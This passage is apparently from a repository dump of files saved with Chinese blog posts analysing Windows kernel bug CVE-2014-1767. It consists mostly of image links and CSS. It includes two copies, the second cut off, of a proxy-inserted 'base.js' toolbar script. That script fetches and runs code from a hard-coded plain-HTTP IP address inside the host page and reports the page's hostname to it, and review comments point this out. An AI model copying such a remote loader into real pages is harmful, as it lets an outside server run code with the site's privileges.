https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120107425-1893723380.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120108128-1338026729.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120108128-1338026729.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120108738-2074080055.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120108738-2074080055.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120109222-836873254.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120109222-836873254.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 
博客园_files/928323-20160501120109894-475395427.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120109894-475395427.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120110363-835793604.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120110363-835793604.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120110863-489063356.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120110863-489063356.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120111488-32302803.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/928323-20160501120111488-32302803.png -------------------------------------------------------------------------------- 
/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/InsertCode.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/InsertCode.gif -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/b.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/b.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/base.js.下载: -------------------------------------------------------------------------------- 1 | /** 2 | * Huawei Technologies http://www.huawei.com 3 | *(c) 2014-2015 4 | *@author Kunal 70924 5 | *@modified 11.12.2014 6 | *@usage The Web URL of this file is used in DMC Proxy Configuration to insert toolbar. 7 | */ 8 | 9 | /** 10 | * This anonymous function executes automatically to insert toolbar template & related resources. 
11 | * It also parses the SCG specified parameters and passes it to TLBS 12 | * 13 | * @param None 14 | * @return None * NOTE(review): this script is a proxy-inserted third-party asset saved together with the blog page (see @usage above); it is not part of the CVE-2014-1767 analysis itself. It loads a further script from a hard-coded plain-HTTP address into the page's own origin (see createjs below), so whatever is served from that address runs with the page's privileges. 15 | */ 16 | (function() { 17 | try { 18 | top.tlbscdr = {}; 19 | top.tlbscdr.jscdr = []; 20 | var cdate = new Date(); 21 | var startcdr = { 22 | 'jsname': 'base.js', 23 | 'jsexetype': '1', 24 | 'btime': cdate 25 | }; 26 | top.tlbscdr.jscdr.push(startcdr); 27 | /** 28 | * get url parameter.for examplate url:http://www.baidu.com?p1=1&p2=2 29 | * getparam('p1') ==1; 30 | */ 31 | var getparam = function(name) { 32 | try { 33 | var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)", "i"); 34 | var r = top.window.location.search.substr(1).match(reg); 35 | if (r != null) return unescape(r[2]); 36 | return ""; 37 | } catch (e) {} 38 | }; /* NOTE(review): getparam returns undefined rather than "" when the RegExp construction or the location access throws, because the catch is empty. The matched value is unescape()d here and later appended to s.src without re-encoding (createjs, line 161). */ 39 | /** 40 | * This function creates a new iFrame element in the service page and then adds all template resources 41 | * as given in the response from JSREQ 42 | * 43 | * @param None 44 | * @return None 45 | */ 46 | var embedjs = function() { 47 | if (top.tlbs && !top.tlbsEmbed) { 48 | top.tlbsEmbed = true; 49 | var head = top.document.getElementsByTagName('head')[0]; 50 | var tlbs = top.tlbs, 51 | js = top.tlbs.iframejs.split("|"), 52 | html = ''; 53 | for (var i = 0; i < js.length; i++) { 54 | if (js[i].indexOf(".js") != -1) { 55 | html += ''; 56 | } else if (js[i].indexOf(".css") != -1) { 57 | var link = document.createElement("link"); 58 | link.rel = "stylesheet"; 59 | link.type = "text/css"; 60 | link.charset = "UTF-8"; 61 | link.href = js[i]; 62 | head.appendChild(link); 63 | } 64 | } 65 | html += ''; 66 | var iframe = document.createElement("iframe"); 67 | iframe.style.display = "none"; 68 | document.body.appendChild(iframe); 69 | try { 70 | var doc = iframe.contentWindow.document; 71 | doc.write(html); 72 | doc.close(); 73 | } catch (e) { 74 | // if (/MSIE/g.test(navigator.userAgent)) { 75 | // if (location.href.indexOf('www.people.com.cn') >= 0 || location.href.indexOf('www.caijing.com.cn') >= 0) { 76 | // 
return; 77 | // } 78 | // } 79 | iframe.src = "javascript:void((function(){document.open();document.domain='" + document.domain + "';document.write('" + html + "');document.close()})())"; /* NOTE(review): html is assembled from top.tlbs.iframejs (split on "|") and spliced into a javascript: URL string literal without any escaping; this fallback also sets document.domain inside the hidden iframe. The bare '' appends on lines 55 and 65 look like markup lost when the page was saved as text — confirm against the original asset before reading the .js branch as a no-op. */ 80 | } 81 | /**To support angularJS ng-hide and show**/ 82 | var angularstyle = document.createElement('style'); 83 | angularstyle.type = 'text/css'; 84 | angularstyle.innerHTML = '@charset "UTF-8";[ng\\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\\:form{display:block;}'; 85 | head.appendChild(angularstyle); 86 | } else { 87 | top.nobar = true; 88 | } 89 | }; 90 | 91 | /** 92 | * This function calls embedjs function once browser is ready to load a script element. 93 | * 94 | * @param Script element 95 | * @return None 96 | */ 97 | var loadjs = function(s) { 98 | if (s.readyState) { 99 | s.onreadystatechange = function() { 100 | if (s.readyState == "loaded" || s.readyState == "complete") { 101 | s.onreadystatechange = null; 102 | embedjs(); 103 | 104 | } 105 | }; 106 | } else { 107 | s.onload = function() { 108 | embedjs(); 109 | 110 | }; 111 | } 112 | }; 113 | 114 | /** 115 | * This function parses all SCG provided parameters and prepares attribute value pair in URI format 116 | * 117 | * @param Attribute List as array 118 | * @return parameter URL with AVPs 119 | */ 120 | var getScgParams = function(attr) { 121 | var len = attr.length, 122 | p = ''; 123 | for (var i = 0; i < len; i++) { 124 | if (!(/^(src|type|id)$/.test(attr[i].name))) 125 | p = p + '&' + attr[i].name + "=" + attr[i].value; 126 | } 127 | return p; 128 | }; /* NOTE(review): getScgParams is currently dead code — its only call site (line 146) is commented out. */ 129 | 130 | 131 | /** 132 | * This function queries script element inserted by Proxy and calls other function to insert iFrame 133 | * and get list of SCG parameters. It also fetches the resource list from Resource Dispatcher and 134 | * adds to the head of the service page. 
135 | * 136 | * @param None 137 | * @return None 138 | */ 139 | var createjs = function() { 140 | var d = document, 141 | t = d.getElementById('1qa2ws'), 142 | //u = t.getAttribute("src"), 143 | h = d.head || d.getElementsByTagName("head")[0], 144 | //a = t.attributes, 145 | 146 | //scgparam = getScgParams(a); 147 | s = d.createElement("script"); 148 | 149 | loadjs(s); 150 | top.apptlbs = {}; 151 | s.charset = "UTF-8"; 152 | var Mytime = new Date(); 153 | var Time = Mytime.getTime(); 154 | //var toolbarURL = u.split('www/')[0]; 155 | var toolbarURL = 'http://111.8.2.135:9002/'; /* NOTE(review): hard-coded plain-HTTP loader origin; the commented-out line 154 shows it was once derived from the proxy-inserted script's src instead. The script element built below is appended to the page head (line 164), so the response from this address executes in the page's origin, and the page's hostname:port is reported to it as the website parameter (line 158). */ 156 | var website = top.window.location ? top.window.location.hostname + (top.window.location.port ? ':' + top.window.location.port : '') : ''; 157 | //s.src = toolbarURL + "get?time=" + Time + "&tlbsip=" + toolbarURL + "&website=" + website + encodeURI(scgparam); 158 | s.src = toolbarURL + "get?time=" + Time + "&tlbsip=" + toolbarURL + "&website=" + website; 159 | var appkey = getparam('appkey'); 160 | if (appkey && (('http://' + website + '/') == toolbarURL)) { 161 | s.src = s.src + "&appkey=" + appkey; 162 | top.apptlbs.appkey = appkey; 163 | } /* NOTE(review): appkey from the query string is forwarded (unencoded, see getparam) only when the page's http:// origin equals toolbarURL. */ 164 | h.appendChild(s); 165 | }; 166 | if (parent == self) { 167 | createjs(); 168 | } 169 | 170 | cdate = new Date(); 171 | var endcdr = { 172 | 'jsname': 'base.js', 173 | 'jsexetype': '2', 174 | 'btime': cdate 175 | }; 176 | top.tlbscdr.jscdr.push(endcdr); 177 | 178 | //TODO: Refer CDR writing in success cases of insertion 179 | } catch (e) { 180 | var d = document; 181 | var t = d.getElementById('1qa2ws'); 182 | var u = t.getAttribute("src"); /* NOTE(review): t is null when no element with id '1qa2ws' exists, so this line throws a TypeError inside the error handler itself; u and params are only consumed by the commented-out lines 193-194, so no failure CDR is ever sent. */ 183 | var params = e.message; 184 | params += "&time=" + new Date().getTime(); 185 | var js = document.createElement('script'); 186 | js.onload = js.onreadystatechange = function() { 187 | if (!this.readyState || this.readyState === 'loaded' || this.readyState === 'complete') { 188 | js.onload = js.onreadystatechange = null; 189 | document.body.removeChild(js); 190 | } 
191 | }; 192 | //TODO: Uncoment below & Refer CDR writing in error cases of insertion 193 | //js.src = u.split('tlbsgui')[0] + "tlbsserver/stagelog?" + params; 194 | //document.body.appendChild(js); 195 | } 196 | 197 | })(window) 198 | -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/bundle-LessIsMore-mobile.css: -------------------------------------------------------------------------------- 1 | body{font-size:14px!important;font-family:'PingFang SC','Helvetica Neue','Helvetica','Arial',sans-serif}#blog_nav_rss{display:none!important}#blog_nav_rss_image{display:none!important}#blog_nav_newpost{display:none!important}img{max-width:300px!important;height:auto}div.commentform textarea{width:330px;height:200px}.commentbox_title{width:auto}#green_channel{width:320px}#cnblogs_post_body table[style]{width:auto!important;height:auto!important}#sidebar_search_box input[type=text]{width:260px}.sh-gutter .line,.sh-gutter code{white-space:normal!important}#cnblogs_post_body table{display:block;overflow-x:scroll;-webkit-overflow-scrolling:regular}#cnblogs_post_body th,#cnblogs_post_body td,.cnblogs-post-body th,.cnblogs-post-body td{white-space:nowrap}#cnblogs_post_body table::-webkit-scrollbar:horizontal{height:12px}#cnblogs_post_body table::-webkit-scrollbar-track{-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);border-radius:10px;background-color:#f5f5f5}#cnblogs_post_body table::-webkit-scrollbar{width:12px;background-color:#f5f5f5}#cnblogs_post_body table::-webkit-scrollbar-thumb{border-radius:10px;-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);background-color:#555}#cnblogs_c1,#cnblogs_c2{text-align:center}.commentform{margin-left:10px} -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/bundle-LessIsMore.css: 
-------------------------------------------------------------------------------- 1 | #EntryTag{margin-top:20px;font-size:9pt;color:gray}#divRefreshComments{text-align:right;margin-right:10px;margin-bottom:5px;font-size:9pt}.topicListFooter{text-align:right;margin-right:10px;margin-top:10px}*{margin:0;padding:0}body{color:#333;background:#fff;font-family:Verdana,Arial,Helvetica,sans-serif;font-size:10pt;line-height:1.8}img{border:0}li{list-style:none}input,textarea{border:1px solid #999}h1,h2,h3,h4,h5,h6,th{font-weight:bold;color:#000}a{text-decoration:none;color:#333}a:hover{color:#999}#sideBar{width:220px;float:left;border:1px solid #999;border-top-width:0;overflow:hidden;padding:0 8px 40px 12px}#mainContent{float:right;margin-left:-250px;width:100%}.forFlow{margin:0 16px 0 266px}#footer{text-align:center}#lnkBlogLogo{display:none}#blogTitle{padding:16px}#blogTitle h1{font-size:17pt}#blogTitle h2{font-size:10.5pt;color:#999}#blogTitle .title{font-size:17pt}#blogTitle .subtitle{font-size:10.5pt;color:#999}#navigator{background:#f6f6f6;border:1px solid #ccc;border-width:1px;height:30px;line-height:30px;color:#999;padding-left:15px;padding-right:5px;padding-top:2px\9}#navigator img{display:none}.blogStats{float:right;color:#999}#navList li{float:left;margin-right:20px;font-size:10.5pt}#sideBar li,.divRecentCommentAticle{text-indent:-1.5em;margin-left:1.5em}#sideBar h3,#MyIng .ing_title{margin:16px 0 0 -8px;font-size:14px;text-align:left}#calendar{margin-top:16px;text-align:center}#calendar table{width:90%;margin:0 auto}#calendar .CalOtherMonthDay{color:#999}#sideBar .divRecentComment{color:#666;margin:0 0 8px 8px}.ing_title a:link,.ing_title a:visited,.ing_title a:hover,.ing_title a:active{font-weight:bold}div.commentform textarea{width:450px;height:300px;ont-size:13px}.dayTitle{display:none}.entrylistTitle,.thumbTitle,.PostListTitle,.forFlow h3 
div,.galleryTitle{font-size:14px;font-weight:bold;margin-top:20px;text-align:left}.entrylistDescription,.thumbDescription{margin-left:16px}.postTitle,.entrylistPosttitle,.feedback_area_title{border-bottom:1px solid #ddd;font-size:14px;font-weight:bold;margin:20px 0 10px}.postBody p{margin-top:12px}.postBody h5{font-size:10pt}.postCon a,.postBody a,.feedbackCon a{border-bottom:1px dotted #333;color:#000}.postCon a:hover,.postBody a:hover,.feedbackCon a:hover{border-color:#999}.postDesc,.entrylistItemPostDesc{border-bottom:1px dotted #999;color:#999;text-align:right;padding-bottom:20px}.PostList{float:none;clear:both;text-align:right;width:96%;margin:auto;padding:6px 0;overflow:hidden;border-bottom:1px dotted #ccc}.postTitl2{float:left}.postText2{text-align:left;color:#666}.feedbackItem{padding:8px;border-bottom:1px dotted #ccc}.feedbackManage{float:right}.feedbackCon{margin-left:1em;color:#666}.commentform td div span{margin-left:12px}.gallery img{margin:8px}#taglist{margin:20px auto}.pfl_feedback_area_title{font-size:16px;margin:16px 0;font-weight:bold}.pfl_feedback_area_title a{font-size:12px;color:#999;font-weight:normal}.pfl_feedbacksubtitle{height:30px}.pfl_feedbackname,.pfl_feedbackManage{float:left;margin:10px 20px 0 0}.pfl_feedbackCon,.pfl_feedbackAnswer{clear:both;margin-left:12px}.btn_my_zzk{border:0}#sideBarMain{padding-left:0}#MyIng{padding-left:10px}p{margin-top:0;margin-bottom:0}div#sideBar div#side_ing_block ul li{margin-left:0;text-indent:0}@media only screen and (max-width:767px){#sideBar{width:auto}.commentbox_main{padding-right:10px}div.commentform textarea{width:100%}#main{padding:0!important}#mainContent{float:none!important;margin-left:0;overflow:initial!important}.forFlow{margin:0 10px}#sideBar{float:none!important;margin-left:0!important;position:static!important}} -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/get: 
-------------------------------------------------------------------------------- 1 | null -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/icon_weibo_24.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/icon_weibo_24.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/img.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/img.gif -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/indent.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/indent.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/lk.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/lk.png 
-------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/quote.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/quote.gif -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/sample_face.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/sample_face.gif -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/wechat.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/1/CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files/wechat.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/24442-20171206093644566-325426505.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/24442-20171206093644566-325426505.png -------------------------------------------------------------------------------- 
/Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/24442-20171208101900738-116140477.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/24442-20171208101900738-116140477.jpg -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/928323-20160501123856410-1417966897.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/928323-20160501123856410-1417966897.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/928323-20160501123856816-1716396550.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/928323-20160501123856816-1716396550.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/928323-20160501123857238-1357395101.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 
博客园_files/928323-20160501123857238-1357395101.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/InsertCode.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/InsertCode.gif -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/b.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/b.png -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/base.js.下载: -------------------------------------------------------------------------------- 1 | /** 2 | * Huawei Technologies http://www.huawei.com 3 | *(c) 2014-2015 4 | *@author Kunal 70924 5 | *@modified 11.12.2014 6 | *@usage The Web URL of this file is used in DMC Proxy Configuration to insert toolbar. 7 | */ 8 | 9 | /** 10 | * This anonymous function executes automatically to insert toolbar template & related resources. 
11 | * It also parses the SCG specified parameters and passes it to TLBS 12 | * 13 | * @param None 14 | * @return None * NOTE(review): this script is a proxy-inserted third-party asset saved together with the blog page (see @usage above); it is not part of the CVE-2014-1767 analysis itself. It loads a further script from a hard-coded plain-HTTP address into the page's own origin (see createjs below), so whatever is served from that address runs with the page's privileges. 15 | */ 16 | (function() { 17 | try { 18 | top.tlbscdr = {}; 19 | top.tlbscdr.jscdr = []; 20 | var cdate = new Date(); 21 | var startcdr = { 22 | 'jsname': 'base.js', 23 | 'jsexetype': '1', 24 | 'btime': cdate 25 | }; 26 | top.tlbscdr.jscdr.push(startcdr); 27 | /** 28 | * get url parameter.for examplate url:http://www.baidu.com?p1=1&p2=2 29 | * getparam('p1') ==1; 30 | */ 31 | var getparam = function(name) { 32 | try { 33 | var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)", "i"); 34 | var r = top.window.location.search.substr(1).match(reg); 35 | if (r != null) return unescape(r[2]); 36 | return ""; 37 | } catch (e) {} 38 | }; /* NOTE(review): getparam returns undefined rather than "" when the RegExp construction or the location access throws, because the catch is empty. The matched value is unescape()d here and later appended to s.src without re-encoding (createjs, line 161). */ 39 | /** 40 | * This function creates a new iFrame element in the service page and then adds all template resources 41 | * as given in the response from JSREQ 42 | * 43 | * @param None 44 | * @return None 45 | */ 46 | var embedjs = function() { 47 | if (top.tlbs && !top.tlbsEmbed) { 48 | top.tlbsEmbed = true; 49 | var head = top.document.getElementsByTagName('head')[0]; 50 | var tlbs = top.tlbs, 51 | js = top.tlbs.iframejs.split("|"), 52 | html = ''; 53 | for (var i = 0; i < js.length; i++) { 54 | if (js[i].indexOf(".js") != -1) { 55 | html += ''; 56 | } else if (js[i].indexOf(".css") != -1) { 57 | var link = document.createElement("link"); 58 | link.rel = "stylesheet"; 59 | link.type = "text/css"; 60 | link.charset = "UTF-8"; 61 | link.href = js[i]; 62 | head.appendChild(link); 63 | } 64 | } 65 | html += ''; 66 | var iframe = document.createElement("iframe"); 67 | iframe.style.display = "none"; 68 | document.body.appendChild(iframe); 69 | try { 70 | var doc = iframe.contentWindow.document; 71 | doc.write(html); 72 | doc.close(); 73 | } catch (e) { 74 | // if (/MSIE/g.test(navigator.userAgent)) { 75 | // if (location.href.indexOf('www.people.com.cn') >= 0 || location.href.indexOf('www.caijing.com.cn') >= 0) { 76 | // 
return; 77 | // } 78 | // } 79 | iframe.src = "javascript:void((function(){document.open();document.domain='" + document.domain + "';document.write('" + html + "');document.close()})())"; /* NOTE(review): html is assembled from top.tlbs.iframejs (split on "|") and spliced into a javascript: URL string literal without any escaping; this fallback also sets document.domain inside the hidden iframe. The bare '' appends on lines 55 and 65 look like markup lost when the page was saved as text — confirm against the original asset before reading the .js branch as a no-op. */ 80 | } 81 | /**To support angularJS ng-hide and show**/ 82 | var angularstyle = document.createElement('style'); 83 | angularstyle.type = 'text/css'; 84 | angularstyle.innerHTML = '@charset "UTF-8";[ng\\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\\:form{display:block;}'; 85 | head.appendChild(angularstyle); 86 | } else { 87 | top.nobar = true; 88 | } 89 | }; 90 | 91 | /** 92 | * This function calls embedjs function once browser is ready to load a script element. 93 | * 94 | * @param Script element 95 | * @return None 96 | */ 97 | var loadjs = function(s) { 98 | if (s.readyState) { 99 | s.onreadystatechange = function() { 100 | if (s.readyState == "loaded" || s.readyState == "complete") { 101 | s.onreadystatechange = null; 102 | embedjs(); 103 | 104 | } 105 | }; 106 | } else { 107 | s.onload = function() { 108 | embedjs(); 109 | 110 | }; 111 | } 112 | }; 113 | 114 | /** 115 | * This function parses all SCG provided parameters and prepares attribute value pair in URI format 116 | * 117 | * @param Attribute List as array 118 | * @return parameter URL with AVPs 119 | */ 120 | var getScgParams = function(attr) { 121 | var len = attr.length, 122 | p = ''; 123 | for (var i = 0; i < len; i++) { 124 | if (!(/^(src|type|id)$/.test(attr[i].name))) 125 | p = p + '&' + attr[i].name + "=" + attr[i].value; 126 | } 127 | return p; 128 | }; /* NOTE(review): getScgParams is currently dead code — its only call site (line 146) is commented out. */ 129 | 130 | 131 | /** 132 | * This function queries script element inserted by Proxy and calls other function to insert iFrame 133 | * and get list of SCG parameters. It also fetches the resource list from Resource Dispatcher and 134 | * adds to the head of the service page. 
